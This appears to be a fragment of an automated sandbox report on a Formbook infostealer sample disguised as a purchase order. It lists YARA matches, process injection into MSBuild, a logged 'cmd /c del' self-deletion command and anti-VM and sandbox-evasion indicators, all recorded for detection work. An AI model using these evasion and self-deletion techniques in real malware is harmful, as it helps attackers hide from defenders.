Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150A309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015ADBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0151ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015923E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0151EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0159FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A4AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01512581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015AD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015BDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015AD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01506E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B2EF7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047E841F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0489D466
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04802581
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A25DD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047D0D20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A2D07
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047ED5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A1D55
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047F6E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A2EF7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0489D616
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048ADFCE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A1FF1
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048020A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A20A8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047FA830
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A28EC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04891002
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048AE824
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047EB090
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047F4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047DF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047F99BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A22AE
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0488FA2B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0480EBB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_047FAB40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048903DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0489DBD2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048A2B28
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067C16E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00668A40
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00668A3B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067C52F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00662D8A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00662D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067BF03
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00662FB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 014EB150 appears 136 times
Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 047DB150 appears 72 times

Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMARCUS.dll4 vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameB2B.exe4 vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe	Binary or memory string: OriginalFilename vs Purchase Order 40,7045$.exe

Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: *.sln
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: /ignoreprojectextensions:.sln
Source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp	Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@16/11

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order 40,7045$.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_01

Source: Purchase Order 40,7045$.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Purchase Order 40,7045$.exe, 00000000.00000000.253166993.0000000000812000.00000002.00020000.sdmp

Binary or memory string: UPDATE [sms].[dbo].[person]set email=@email, street=@street, city=@city, district=@district, zip=@zip WHERE id=;Student Information updated!!

Source: Purchase Order 40,7045$.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe {path}
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: Purchase Order 40,7045$.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Purchase Order 40,7045$.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Purchase Order 40,7045$.exe

Static file information: File size 1269760 > 1048576

Source: Purchase Order 40,7045$.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x135800

Source: Purchase Order 40,7045$.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000001.00000002.289628195.00000000014C0000.00000040.00000001.sdmp, raserver.exe, 00000006.00000002.522839886.00000000047B0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: MSBuild.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp
Source:	Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: raserver.exe, 00000006.00000002.521945059.00000000009EC000.00000004.00000020.sdmp
Source:	Binary string: RAServer.pdbGCTL source: MSBuild.exe, 00000001.00000002.289540169.0000000001229000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: Purchase Order 40,7045$.exe, a?opP?s???y/WD??v?aA?O.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.Purchase Order 40,7045$.exe.810000.0.unpack, a?opP?s???y/WD??v?aA?O.cs	.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_0130DF50 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00415913 push edx; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041AC62 push D8D19732h; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414D57 push esi; retf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041AD65 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414DEA push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041ADB2 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041ADBB push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414E7E push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041AE1C push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00414E24 push eax; ret
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0040FF92 push 00000033h; iretd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0153D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0482D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00675913 push edx; retf
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067AC62 push D8D19732h; iretd
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067AD65 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00674D57 push esi; retf
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00674DEA push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067ADB2 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067ADBB push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00674E7E push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00674E24 push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0067AE1C push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0066FF92 push 00000033h; iretd

Source: initial sample

Static PE information: section name: .text entropy: 7.30520133301

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.260021885.0000000002D8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Purchase Order 40,7045$.exe PID: 6708, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 00000000006683D4 second address: 00000000006683DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 000000000066876E second address: 0000000000668774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004086A0 rdtsc

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6712	Thread sleep time: -41500s >= -30000s
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe TID: 6728	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6596	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe TID: 6136	Thread sleep time: -52000s >= -30000s

Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000000.274511209.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.265134044.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000002.522311765.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000002.531888786.00000000053D7000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
